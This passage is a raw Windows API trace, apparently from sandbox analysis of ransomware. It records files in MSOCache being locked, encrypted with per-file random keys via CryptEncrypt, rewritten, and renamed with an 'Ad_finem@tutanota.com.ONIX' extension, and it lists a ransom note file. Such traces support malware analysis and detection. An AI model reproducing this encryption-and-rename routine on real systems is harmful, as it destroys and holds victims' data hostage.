WriteFile (in: hFile=0x494, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0114.912] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x7200000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.912] ReadFile (in: hFile=0x494, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0114.922] SetFilePointer (in: hFile=0x494, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7200000 [0114.922] WriteFile (in: hFile=0x494, lpBuffer=0x3680020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesWritten=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0114.929] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x9b6bba7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.929] WriteFile (in: hFile=0x494, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0114.930] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x8500000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.930] ReadFile (in: hFile=0x494, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0114.940] SetFilePointer (in: hFile=0x494, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8500000 [0114.940] WriteFile (in: hFile=0x494, lpBuffer=0x3680020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesWritten=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0114.947] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x9b6bba7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.947] WriteFile (in: hFile=0x494, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0114.948] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x2b30020 | out: hHeap=0x410000) returned 1 [0114.952] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x3680020 | out: hHeap=0x410000) returned 1 [0114.957] UnlockFile (hFile=0x494, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x9b6ba9f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0114.957] CloseHandle (hObject=0x494) returned 1 [0114.976] GetProcessHeap () returned 0x410000 [0114.976] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0114.976] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0114.978] GetProcessHeap () returned 0x410000 [0114.978] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0114.978] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0114.978] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0114.978] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0114.978] FindNextFileW (in: hFindFile=0x48ecb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x69dde270, ftCreationTime.dwHighDateTime=0x1cb04b2, ftLastAccessTime.dwLowDateTime=0x69dde270, ftLastAccessTime.dwHighDateTime=0x1cb04b2, ftLastWriteTime.dwLowDateTime=0xa8191670, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x150578, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="setup.exe", cAlternateFileName="")) returned 1 [0114.978] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0114.978] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0114.978] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458a78 [0114.978] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0114.978] GetLastError () returned 0x0 [0114.979] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x494 [0114.979] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0114.979] LockFile (hFile=0x494, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x150578, nNumberOfBytesToLockHigh=0x0) returned 1 [0114.979] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0114.979] ReadFile (in: hFile=0x494, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0114.981] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.981] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0114.981] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0114.981] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0114.981] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe", dwFileAttributes=0x80) returned 1 [0114.981] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 73 [0114.981] GetProcessHeap () returned 0x410000 [0114.981] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x102) returned 0x467908 [0114.981] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" [0114.981] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0114.981] GetFileSizeEx (in: hFile=0x494, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=1377656) returned 1 [0114.981] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x150578 [0114.982] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0114.982] GetProcessHeap () returned 0x410000 [0114.982] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0114.982] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0114.982] WriteFile (in: hFile=0x494, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0114.983] WriteFile (in: hFile=0x494, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0114.984] WriteFile (in: hFile=0x494, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0114.985] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x150578) returned 0x2b30020 [0114.986] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x150578) returned 0x3680020 [0114.986] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.986] ReadFile (in: hFile=0x494, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x150578, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x150578, lpOverlapped=0x0) returned 1 [0115.078] UnlockFile (hFile=0x494, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x150578, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0115.078] CloseHandle (hObject=0x494) returned 1 [0115.078] GetProcessHeap () returned 0x410000 [0115.078] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0115.078] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0115.080] GetProcessHeap () returned 0x410000 [0115.080] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0115.080] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0115.080] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0115.080] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0115.081] FindNextFileW (in: hFindFile=0x48ecb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7ca00570, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7ca00570, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa8c227b0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x412b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0115.081] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0115.081] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0115.081] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458a78 [0115.081] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0115.081] GetLastError () returned 0x0 [0115.081] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x494 [0115.081] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0115.081] LockFile (hFile=0x494, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x412b, nNumberOfBytesToLockHigh=0x0) returned 1 [0115.081] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0115.081] ReadFile (in: hFile=0x494, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0115.083] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.083] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0115.083] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0115.083] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0115.083] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0115.083] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 73 [0115.083] GetProcessHeap () returned 0x410000 [0115.083] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x102) returned 0x467908 [0115.084] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" [0115.084] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0115.084] GetFileSizeEx (in: hFile=0x494, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=16683) returned 1 [0115.084] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x412b [0115.084] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0115.084] GetProcessHeap () returned 0x410000 [0115.084] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0115.084] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0115.084] WriteFile (in: hFile=0x494, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0115.085] WriteFile (in: hFile=0x494, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0115.086] WriteFile (in: hFile=0x494, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0115.087] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x412b) returned 0x4d8b68 [0115.087] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x412b) returned 0x4dcca0 [0115.088] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.088] ReadFile (in: hFile=0x494, lpBuffer=0x4d8b68, nNumberOfBytesToRead=0x412b, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8b68*, lpNumberOfBytesRead=0x367f44c*=0x412b, lpOverlapped=0x0) returned 1 [0115.091] UnlockFile (hFile=0x494, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x412b, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0115.091] CloseHandle (hObject=0x494) returned 1 [0115.091] GetProcessHeap () returned 0x410000 [0115.091] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0115.091] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0115.094] GetProcessHeap () returned 0x410000 [0115.094] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0115.094] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0115.094] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0115.094] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0115.094] FindNextFileW (in: hFindFile=0x48ecb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30c684f0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30c684f0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c8e650, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0115.094] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0115.094] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0115.094] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458a78 [0115.094] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0115.094] GetLastError () returned 0x0 [0115.094] FindNextFileW (in: hFindFile=0x48ecb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30c684f0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30c684f0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c8e650, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0115.094] CloseHandle (hObject=0x3cc) returned 1 [0115.094] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0115.095] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x36, wMilliseconds=0x1d6)) [0115.095] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0115.095] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0115.095] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0115.095] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C9c354ca09c354b444c.lock") returned 86 [0115.095] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C9c354ca09c354b444c.lock" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0115.096] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0115.096] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0115.096] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x90) returned 0x460008 [0115.096] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0115.096] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b00 | out: hHeap=0x410000) returned 1 [0115.096] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f748 | out: hHeap=0x410000) returned 1 [0115.096] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x30c8e650, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c8e650, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48ecf0 [0115.096] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0115.096] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0115.096] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0115.096] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0115.096] GetLastError () returned 0x0 [0115.096] FindNextFileW (in: hFindFile=0x48ecf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x30c8e650, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c8e650, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0115.096] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0115.097] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0115.097] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0115.097] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0115.097] GetLastError () returned 0x0 [0115.097] FindNextFileW (in: hFindFile=0x48ecf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe5ed9630, ftCreationTime.dwHighDateTime=0x1cb12b3, ftLastAccessTime.dwLowDateTime=0xe5ed9630, ftLastAccessTime.dwHighDateTime=0x1cb12b3, ftLastWriteTime.dwLowDateTime=0x4655d500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0115.097] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0115.097] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0115.097] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, 